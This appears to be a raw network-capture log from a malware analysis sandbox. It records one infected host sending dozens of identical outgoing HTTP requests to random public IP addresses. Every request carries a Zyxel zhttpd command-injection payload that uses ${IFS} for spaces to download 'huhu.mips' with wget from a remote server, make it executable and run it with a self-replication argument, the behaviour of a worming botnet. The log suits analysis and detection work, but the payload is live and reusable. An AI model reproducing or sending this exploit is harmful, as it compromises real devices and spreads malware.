                                                      Feb 2, 2024 06:35:58.751137018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5782192.168.2.1442166149.95.4.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751199961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5783192.168.2.144427065.59.118.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751216888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5784192.168.2.1455938162.218.130.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751249075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5785192.168.2.1457194196.30.37.66443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751275063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5786192.168.2.145824613.10.250.82443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751307011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5787192.168.2.145822068.162.188.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751360893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5788192.168.2.1449332213.213.110.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751398087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5789192.168.2.1460356191.207.202.194443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751425982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5790192.168.2.1446190149.124.21.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751460075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5791192.168.2.1440406100.174.206.140443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751492977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5792192.168.2.1440344194.5.152.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751527071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5793192.168.2.1460298130.196.145.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751590967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5794192.168.2.143455666.31.47.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751614094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5795192.168.2.144915295.196.73.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751658916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5796192.168.2.1446934161.223.131.186443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751694918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5797192.168.2.1451194139.153.149.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751733065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5798192.168.2.145492084.18.180.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751780033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5799192.168.2.1441368196.12.191.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751816988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5800192.168.2.1456986110.4.156.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751852989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5801192.168.2.1448100185.90.7.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751919031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5802192.168.2.144066061.196.207.99443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751955986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5803192.168.2.1444632156.120.94.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.751991034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5804192.168.2.1438816176.158.84.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752024889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5805192.168.2.1444800181.174.194.90443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752068996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5806192.168.2.1443390196.88.243.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752105951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5807192.168.2.1435444219.79.98.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752135038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5808192.168.2.144140237.193.42.205443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752183914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5809192.168.2.1448362126.88.195.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752216101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5810192.168.2.144291294.64.176.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752253056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5811192.168.2.1434496204.42.201.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752278090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5812192.168.2.1447800191.237.40.120443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752314091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5813192.168.2.1433938175.143.70.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752356052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5814192.168.2.14458709.90.45.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752388000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5815192.168.2.1438708217.118.5.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752424002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5816192.168.2.1450144217.245.174.185443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752454996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5817192.168.2.143475646.205.60.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752504110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5818192.168.2.1446638111.123.138.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752537012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5819192.168.2.1437926135.172.26.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752594948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5820192.168.2.1452578117.153.201.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752633095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5821192.168.2.143979639.250.151.35443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752670050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5822192.168.2.1443274156.183.84.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752712965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5823192.168.2.1443204131.211.228.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752744913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5824192.168.2.1439020189.124.34.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752784014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5825192.168.2.1455306201.122.153.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752810001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5826192.168.2.1459008161.121.239.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752856970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5827192.168.2.144133678.13.125.29443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752907038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5828192.168.2.1453886158.87.107.7443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.752948046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5829192.168.2.145789418.80.177.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753000975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5830192.168.2.1434534212.6.197.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753045082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5831192.168.2.1441824198.201.158.237443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753063917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5832192.168.2.1458512182.13.36.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753106117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5833192.168.2.145272068.42.35.164443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753150940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5834192.168.2.1449632165.255.240.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753200054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5835192.168.2.1455032203.221.65.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753221989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5836192.168.2.1436220107.49.166.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753267050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5837192.168.2.1442308190.173.162.52443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753300905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5838192.168.2.144127465.24.199.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753360033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5839192.168.2.1441996217.166.76.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753377914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5840192.168.2.145280688.9.39.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753423929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5841192.168.2.145019449.144.113.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753464937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5842192.168.2.1445388138.239.112.12443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753485918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5843192.168.2.145502017.160.9.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:58.753529072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5844192.168.2.143800043.104.161.39443
                                                      TimestampBytes transferredDirectionData
